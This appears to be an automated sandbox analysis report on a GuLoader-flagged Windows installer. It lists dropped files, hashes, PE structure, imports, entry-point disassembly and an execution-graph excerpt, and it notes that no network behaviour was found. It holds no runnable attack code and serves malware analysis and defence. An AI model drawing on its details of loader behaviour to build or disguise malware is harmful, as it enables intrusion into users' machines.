                                Preview:ITSF....`..................|.{.......".....|.{......."..`...............x.......T.......................................ITSP....T...........................................j..].!......."..T...............PMGL................./..../#IDXHDR...M.../#ITBITS..../#STRINGS...2.]./#SYSTEM..f.T./#TOPICS...M.@./#URLSTR...}.5./#URLTBL.....p./#WINDOWS...M.L./$FIftiMain......G./$OBJINST...G.?./$WWAssociativeLinks/..../$WWAssociativeLinks/Property...C../$WWKeywordLinks/..../$WWKeywordLinks/BTree.....L./$WWKeywordLinks/Data...e4./$WWKeywordLinks/Map....../$WWKeywordLinks/Property...# ./Advanced_Phone_Operations.htm....../Audio_Services.htm....../Authorization_Options.htm.....$/Bluetooth Win7 Vista Suite help.hhc...Z.k$/Bluetooth Win7 Vista Suite help.hhk...E.../Bluetooth_Devices.htm..0..z./Bluetooth_Devices_files/...//Bluetooth_Devices_files/colorschememapping.xml...\.:%/Bluetooth_Devices_files/filelist.xml...a.['/Bluetooth_Devices_files/themedata.thmx...<. ./Bluetooth_Settings.htm...*..[./Bluetooth_
                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):101480
                                Entropy (8bit):5.754479856662274
                                Encrypted:false
                                SSDEEP:1536:HMrDKbA8xl6y9Oj2FqnawHzDYwVY4quXoYbggnC:HM6dMy9MHBVY4qAolOC
                                MD5:25F3ECFD195030F6B1BAD60E5EF97163
                                SHA1:749B7E267CDBBC83783DFA4C7BF45134556C13D7
                                SHA-256:FCD740746D2B3E01945E6A099AB4CDD06ECE05818E25D08C5DDAFBD333B0DC84
                                SHA-512:D91803A022DD9A6EF0E77CB231A5FB5DD1BC275F4CC38D886FD365B7EEAD094712ADC4FA3AAFFB8354DC193BAC3B8697F685631AE3B4D23924387706DB3C0DD9
                                Malicious:false
                                Antivirus:
                                • Antivirus: Metadefender, Detection: 0%, Browse
                                • Antivirus: ReversingLabs, Detection: 0%
                                Joe Sandbox View:
                                • Filename: SCAN Swift 054545676700000000000000001.exe, Detection: malicious, Browse
                                • Filename: SCAN Swift 054545676700000000000000001.exe, Detection: malicious, Browse
                                • Filename: PO64747835 PDF.exe, Detection: malicious, Browse
                                • Filename: proforma invoice pdf.exe, Detection: malicious, Browse
                                • Filename: proforma invoice pdf.exe, Detection: malicious, Browse
                                Reputation:low
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?!..........." ..0..h............... ........... ....................................`.....................................O.......|............r..h...............T............................................ ............... ..H............text....g... ...h.................. ..`.rsrc...|............j..............@..@.reloc...............p..............@..B.......................H........u................................................................(....*.0..S........ r...pr3..p..(....(1...........o2.....r...pr...pr3..p. (....... r...pr3..p."(....*..........'.......0..K........ r...pr3..p.'(....(1...o4.....r...pr...pr3..p..(....... r...pr3..p.0(....*..................0..L........ r@..pr3..p.6(..........(......r...pr@..pr3..p.=(....... r@..pr3..p.?(....*......... .......0..u........ r...pr3..p.C(.....(...+..(...+.(....%.o....(.....o....(....o....o.
                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
                                File Type:ASCII text, with very long lines, with no line terminators
                                Category:dropped
                                Size (bytes):40792
                                Entropy (8bit):3.999599228878197
                                Encrypted:false
                                SSDEEP:768:mjZY5hx4iG8s1aNb/ibV5bVWsrUIDCf7+WFIUf4ndUpPacYQoxalE:n5huie1wrGDb8yUkCf7ZLRblE
                                MD5:B62B20F6B03B0C3A561EA7B0AEB0E812
                                SHA1:72B3F32CE0DB4909D7CF0C4385718188C61CA2C6
                                SHA-256:12C49D1622818D8454A1E4BB2EFBF21459CCE0C284A31D53E775B0B24EC849CF
                                SHA-512:CF0942474012DE7A28F26834DCBDFD2BCFF66EFB7DC29E4FE247284C3BF3B03B3BF16A43692D9CCF792B5CA1123298EE10678FF4BA0889587935F086B78759AB
                                Malicious:false
                                Reputation:low
                                Preview:12DD7C5DF1DC1C85A7F912D20270BDE34F75DB974905373A47A9222CF1CD91C18401E69E670598DAC7D11062C350C991B984AFE98D2B41AADC5D1FC42C4A849C81F58769ED9DD262748B85FD4BB9302E37B2A513A839D6EF56718CE0F88E8F3C78431B21BD17D184111E0B6BC4613F4291D2FB97F169B6B72769DB06F441794BE443B272B8D2C24213A717CBD5DD563B39049838D5E85781A0B36B5BFF6028ECFD880173373F1786E49FE13DDF804CD79EF0B78AED8A247EFD8AA720E923B2FDE60D4FAA692EB20B31D2FEEDED7B6ECE2AE00A8702916290821AE2DF083AC9E5077DFB3C75415B100218FD09923BF4A2BD5CE3773EEA4635A9087C162E721AD561A9822BD549067A646B0819D033F8860ECC13485D5D7CD8BCBC7000DEAF01EEAAC82344FE8263E75304485D415EEB03FC9E990FBDD675355156F7BFCEF5D09B4FA39840B44D6B0C31B91B9B851D1F0F46814CF15B15A785C77561585D846941FC200022D9575A9D643BC9827948614A78E90CCBBEF4206D3927662BC493415C7ADD540249A351AD5253ADC362499C8D3FB17FB819625233A6062C278B7C0EC4BA6EB1E7037F2B93D9776187AB0A6B7548753298B7A79642040FAB60D6DD51BE3CAD6317B9714467350E7B8C6B48F17628CA7371D8E951F6E76E63A2C3007FC01B3DC99F034B8E7C042CB7FD31251EDCE49714C2
                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
                                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                Category:dropped
                                Size (bytes):22479
                                Entropy (8bit):5.08095074751023
                                Encrypted:false
                                SSDEEP:384:PxozhVwKBMySMIKoE/pJf2OG3mcJ7t/CWP9At/H:P6Vf2yS0r/pJf6BEWP9At/H
                                MD5:8154B723020AEE70829FFC138C9D1C4C
                                SHA1:6F7AF3827B37845F071625458DF1DB8BA9056FD6
                                SHA-256:902F9D2A239CCAEBA677DB5838654FB6CE7CF3D21243B8EF122E9D970714B0D3
                                SHA-512:D3F59F778AA72D26896AA2C81972F144DAB716DFA8E45E7B3C59F528B2752FE9E8971C86CF927C62E7501D9910E9D1212EFA1A58C29796A92E2D433116E76931
                                Malicious:false
                                Antivirus:
                                • Antivirus: Metadefender, Detection: 0%, Browse
                                • Antivirus: ReversingLabs, Detection: 0%
                                Joe Sandbox View:
                                • Filename: SCAN Swift 054545676700000000000000001.exe, Detection: malicious, Browse
                                • Filename: SCAN Swift 054545676700000000000000001.exe, Detection: malicious, Browse
                                • Filename: PO64747835 PDF.exe, Detection: malicious, Browse
                                • Filename: proforma invoice pdf.exe, Detection: malicious, Browse
                                • Filename: proforma invoice pdf.exe, Detection: malicious, Browse
                                Reputation:low
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........N..E.....&....%. ...J.................@....................................>.....`... ..............................................................P..@............................................@..(...................\................................text...X........ ..................`..`.data........0.......$..............@....rdata.......@.......&..............@..@.pdata..@....P.......2..............@..@.xdata.......`.......6..............@..@.bss.........p...........................idata...............8..............@....CRT....`............B..............@....tls.................D..............@....rsrc................F..............@....reloc...............L..............@..B........................................................................................................................................................................
                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                Category:dropped
                                Size (bytes):602739
                                Entropy (8bit):6.344393812734055
                                Encrypted:false
                                SSDEEP:12288:PCaPBchMCFjXEbIaM43VV1oSIG5BY5IikQH/oNguISjFovd:KaaMCeVV1oSIG5BY3/oNuSjFovd
                                MD5:58BFEB91921D4882F7EDABAB9C0C1C17
                                SHA1:596DB0512A25089EF7CDE48CA3393E4F6878FF90
                                SHA-256:5C9DB6D64BAF0250735368825CEC3032EC39999F266125D132157ECC0403EE12
                                SHA-512:A86C5F00109267532531366DF07A0187D2FBB80E1628A6E30508AA74098CAB4CDF5CAD54468929604F89CAA656BDBEF6B2F25C462AA1B72898B66F3B8D227AA2
                                Malicious:false
                                Antivirus:
                                • Antivirus: Metadefender, Detection: 0%, Browse
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:low
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........&..V.....&"...%....."......P..........Y....................................P|....`... ......................................`.......p..,...............L...........................................@...(...................$r...............................text...............................`..`.data...............................@....rdata..............................@..@.pdata..L...........................@..@.xdata...#... ...$..................@..@.bss.........P...........................edata.......`......................@..@.idata..,....p......................@....CRT....X............ ..............@....tls................."..............@....reloc...............$..............@..B........................................................................................................................................................................
                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                Category:dropped
                                Size (bytes):49851
                                Entropy (8bit):5.71925712297816
                                Encrypted:false
                                SSDEEP:768:59P9Y+clVaXLNcGRmDRC31lRrox5iJXx/gn9VFuKVcXGJMRv7hb8u+DwbMORdiPF:HPe+IkBcAEC31luGCQKKWJa8atRIPNQa
                                MD5:6A9928C42EB4375CCEF3A025F3535795
                                SHA1:395703F4970B42F55C2BCB2B8CF3F0D12E192CEB
                                SHA-256:CAA457EF4BD84476790D215FFFF048DEB162CABC14DB3FF679795CCEA8972411
                                SHA-512:27F1E2E3DDF052A05D9F0C48E0936E0D4A7E850E4E835EAED96495E6241167915FCDAD371EA206C5B741846D70FF3AFCBA83269B01ED90B22B3F7F42572F03DB
                                Malicious:false
                                Antivirus:
                                • Antivirus: Metadefender, Detection: 0%, Browse
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...........~.....&"...%.h..........P..........V.............................P.......O....`... .................................................\....0..8....................@..l...........................@...(....................................................text...hf.......h..................`..`.data................l..............@....rdata..P............n..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..............................@..@.idata..\...........................@....CRT....X...........................@....tls......... ......................@....rsrc...8....0......................@....reloc..l....@......................@..B................................................................................................................................
                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):773968
                                Entropy (8bit):6.901559811406837
                                Encrypted:false
                                SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                MD5:0E37FBFA79D349D672456923EC5FBBE3
                                SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                Malicious:false
                                Antivirus:
                                • Antivirus: Metadefender, Detection: 0%, Browse
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):12288
                                Entropy (8bit):5.814115788739565
                                Encrypted:false
                                SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                MD5:CFF85C549D536F651D4FB8387F1976F2
                                SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                Malicious:false
                                Antivirus:
                                • Antivirus: Metadefender, Detection: 3%, Browse
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):429
                                Entropy (8bit):7.2660585571428715
                                Encrypted:false
                                SSDEEP:12:6v/723xn6PprukRVpsTWuFTEmRpnJGoQ6:9n6P7RvsTWuFTXpnNQ6
                                MD5:84D033B14C06568FA57352CCF18D8D35
                                SHA1:1D75B42F61842E8B0FA8D811DAC72B313CDDCA74
                                SHA-256:3989B93626DC3ED6EF03430AD0B1FF5C6E358DAC76E34ED7C8086579B68E660F
                                SHA-512:EAFE07814DF75D019EB39D999325818CE8F2D164A621E713709EE5E1F3D260EB6BCAA726A17588D034F6A6E7733B71A5141CE5B4CFCE267CBFA22B82D6227783
                                Malicious:false
                                Preview:.PNG........IHDR................a...tIDATx..S.n.P.-.6w7..8;...#.E.].8.....wh.O."......`....^o{...4.R .....4..F{....h..}o.X..d...4M..V.ELH.aA.-.%D<..g.Tj.....x....[E(..J.z..n7...R..X..\..D...!..h5............3.w/... ....K.;c....MO.O.`........h4..d......`~T9::"..I...0p.R..\.....&.....;.F..X.a....;.._%....P.\.B.D..t.D..Y....B.Z..1...5U.U...1...Z..D"R.T..w@:...%.....\...\..-.B......E{....h..;w....p..+....IEND.B`.
                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
                                File Type:SVG Scalable Vector Graphics image
                                Category:dropped
                                Size (bytes):335
                                Entropy (8bit):4.737555359684875
                                Encrypted:false
                                SSDEEP:6:TMVBd/6o8GUYl/n7S3mc4slZRI2rjFvRbWHFHUHFvCpifW1IUHFBLJZtSKlNK+:TMHdPnnl/nu3i2FZ484sIBLjdlj
                                MD5:C05C42CB3D95BF3BC7F49CCD8DCCA510
                                SHA1:20442E344E95508586B1B2A7B4C6272C3F5C86F8
                                SHA-256:695554CE5F23A275D3C25C27410D0CFBF8A83156807DAA3A601635E4E5D8AED0
                                SHA-512:0EC19BBA7B5032670524965A8C55D8C6401F833000880DE1C0F74A5EAA4E302B0CE3E60218F3DDB95CB3E1EA7374A197CB71682526DFF910D9A6CF35FF971BB6
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg">. <path d="m 4 1 c -1.660156 0 -3 1.339844 -3 3 v 8 c 0 1.660156 1.339844 3 3 3 h 8 c 1.660156 0 3 -1.339844 3 -3 v -8 c 0 -1.660156 -1.339844 -3 -3 -3 z m 0 6 h 8 v 2 h -8 z m 0 0" fill="#2e3436"/>.</svg>.
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                Entropy (8bit):7.766288797716623
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
                                File size:1007819
                                MD5:77436b29832ded92b60491ea36018196
                                SHA1:0314eca204964e3e189b0c0aed7f449e487dc98e
                                SHA256:b19c8495104c354de9aa1b3403bff2d1211a89fe8892e866d2d8dfd7bb0ba5da
                                SHA512:799337dba429abed98ace7b229214f33706e0f00629992617327706694ec67c45ef9fdb878567eeec27a0e84c8b3a2bae37f572d37a1491bf934571160fd3c7f
                                SSDEEP:24576:bbHw3bPzBxU7lXzd2+gIsofFiXKU74yNC/:fHUnWxlMo9i6/
                                TLSH:A52512216654F813E3900A71C5F6F3BD49B4FE382E61CA03A6687F2D363E75C9929312
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........
                                Icon Hash:7cbc7e6e78b0e010
                                Entrypoint:0x40352d
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                Time Stamp:0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6
                                Instruction
                                push ebp
                                mov ebp, esp
                                sub esp, 000003F4h
                                push ebx
                                push esi
                                push edi
                                push 00000020h
                                pop edi
                                xor ebx, ebx
                                push 00008001h
                                mov dword ptr [ebp-14h], ebx
                                mov dword ptr [ebp-04h], 0040A2E0h
                                mov dword ptr [ebp-10h], ebx
                                call dword ptr [004080CCh]
                                mov esi, dword ptr [004080D0h]
                                lea eax, dword ptr [ebp-00000140h]
                                push eax
                                mov dword ptr [ebp-0000012Ch], ebx
                                mov dword ptr [ebp-2Ch], ebx
                                mov dword ptr [ebp-28h], ebx
                                mov dword ptr [ebp-00000140h], 0000011Ch
                                call esi
                                test eax, eax
                                jne 00007FBF7CC9DB0Ah
                                lea eax, dword ptr [ebp-00000140h]
                                mov dword ptr [ebp-00000140h], 00000114h
                                push eax
                                call esi
                                mov ax, word ptr [ebp-0000012Ch]
                                mov ecx, dword ptr [ebp-00000112h]
                                sub ax, 00000053h
                                add ecx, FFFFFFD0h
                                neg ax
                                sbb eax, eax
                                mov byte ptr [ebp-26h], 00000004h
                                not eax
                                and eax, ecx
                                mov word ptr [ebp-2Ch], ax
                                cmp dword ptr [ebp-0000013Ch], 0Ah
                                jnc 00007FBF7CC9DADAh
                                and word ptr [ebp-00000132h], 0000h
                                mov eax, dword ptr [ebp-00000134h]
                                movzx ecx, byte ptr [ebp-00000138h]
                                mov dword ptr [00434FB8h], eax
                                xor eax, eax
                                mov ah, byte ptr [ebp-0000013Ch]
                                movzx eax, ax
                                or eax, ecx
                                xor ecx, ecx
                                mov ch, byte ptr [ebp-2Ch]
                                movzx ecx, cx
                                shl eax, 10h
                                or eax, ecx
                                Programming Language:
                                • [EXP] VC++ 6.0 SP5 build 8804
                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x6c0000x28498.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x68970x6a00False0.666126179245data6.45839821493IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                .rdata0x80000x14a60x1600False0.439275568182data5.02410928126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data0xa0000x2b0180x600False0.521484375data4.15458210409IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                .ndata0x360000x360000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .rsrc0x6c0000x284980x28600False0.447235390867data5.43623310188IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                NameRVASizeTypeLanguageCountry
                                RT_ICON0x6c3580x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                RT_ICON0x7cb800x94a8dataEnglishUnited States
                                RT_ICON0x860280x5488dataEnglishUnited States
                                RT_ICON0x8b4b00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 65279, next used block 4294967040EnglishUnited States
                                RT_ICON0x8f6d80x25a8dataEnglishUnited States
                                RT_ICON0x91c800x10a8dataEnglishUnited States
                                RT_ICON0x92d280x988dataEnglishUnited States
                                RT_ICON0x936b00x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                RT_DIALOG0x93b180x100dataEnglishUnited States
                                RT_DIALOG0x93c180x11cdataEnglishUnited States
                                RT_DIALOG0x93d380xc4dataEnglishUnited States
                                RT_DIALOG0x93e000x60dataEnglishUnited States
                                RT_GROUP_ICON0x93e600x76dataEnglishUnited States
                                RT_VERSION0x93ed80x27cdataEnglishUnited States
                                RT_MANIFEST0x941580x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States
                                DLLImport
                                ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                DescriptionData
                                LegalCopyrightEuthanasiachromo202
                                FileVersion24.24.17
                                CompanyNameConciliato
                                LegalTrademarksLASHINGPREEXPOU
                                CommentsSubconceptflovse2
                                ProductNameRitha
                                FileDescriptionandenk
                                Translation0x0409 0x04b0
                                Language of compilation systemCountry where language is spokenMap
                                EnglishUnited States
                                No network behavior found

                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Target ID:0
                                Start time:20:57:13
                                Start date:27/05/2022
                                Path:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe"
                                Imagebase:0x400000
                                File size:1007819 bytes
                                MD5 hash:77436B29832DED92B60491EA36018196
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.778304741.0000000002830000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:20.5%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:16.2%
                                  Total number of Nodes:1576
                                  Total number of Limit Nodes:37
                                  execution_graph 3933 401941 3934 401943 3933->3934 3939 402da6 3934->3939 3940 402db2 3939->3940 3985 40657a 3940->3985 3943 401948 3945 405c49 3943->3945 4027 405f14 3945->4027 3948 405c71 DeleteFileW 3950 401951 3948->3950 3949 405c88 3951 405db3 3949->3951 4041 40653d lstrcpynW 3949->4041 3951->3950 4070 406873 FindFirstFileW 3951->4070 3953 405cae 3954 405cc1 3953->3954 3955 405cb4 lstrcatW 3953->3955 4042 405e58 lstrlenW 3954->4042 3957 405cc7 3955->3957 3960 405cd7 lstrcatW 3957->3960 3961 405ccd 3957->3961 3962 405ce2 lstrlenW FindFirstFileW 3960->3962 3961->3960 3961->3962 3966 405da8 3962->3966 3983 405d04 3962->3983 3963 405dd1 4073 405e0c lstrlenW CharPrevW 3963->4073 3966->3951 3967 405d8b FindNextFileW 3971 405da1 FindClose 3967->3971 3967->3983 3968 405c01 5 API calls 3970 405de3 3968->3970 3972 405de7 3970->3972 3973 405dfd 3970->3973 3971->3966 3972->3950 3976 40559f 24 API calls 3972->3976 3975 40559f 24 API calls 3973->3975 3975->3950 3978 405df4 3976->3978 3977 405c49 60 API calls 3977->3983 3980 4062fd 36 API calls 3978->3980 3979 40559f 24 API calls 3979->3967 3982 405dfb 3980->3982 3982->3950 3983->3967 3983->3977 3983->3979 4046 40653d lstrcpynW 3983->4046 4047 405c01 3983->4047 4055 40559f 3983->4055 4066 4062fd MoveFileExW 3983->4066 3996 406587 3985->3996 3986 4067aa 3987 402dd3 3986->3987 4018 40653d lstrcpynW 3986->4018 3987->3943 4002 4067c4 3987->4002 3989 406778 lstrlenW 3989->3996 3992 40657a 10 API calls 3992->3989 3993 40668f GetSystemDirectoryW 3993->3996 3995 4066a2 GetWindowsDirectoryW 3995->3996 3996->3986 3996->3989 3996->3992 3996->3993 3996->3995 3997 406719 lstrcatW 3996->3997 3998 40657a 10 API calls 3996->3998 3999 4067c4 5 API calls 3996->3999 4000 4066d1 SHGetSpecialFolderLocation 3996->4000 4011 40640b 3996->4011 4016 406484 wsprintfW 3996->4016 4017 40653d lstrcpynW 3996->4017 3997->3996 3998->3996 3999->3996 4000->3996 4001 4066e9 SHGetPathFromIDListW CoTaskMemFree 4000->4001 4001->3996 4009 4067d1 4002->4009 4003 406847 4004 40684c CharPrevW 4003->4004 4006 40686d 4003->4006 4004->4003 4005 40683a CharNextW 4005->4003 4005->4009 4006->3943 4008 406826 CharNextW 4008->4009 4009->4003 4009->4005 4009->4008 4010 406835 CharNextW 4009->4010 4023 405e39 4009->4023 4010->4005 4019 4063aa 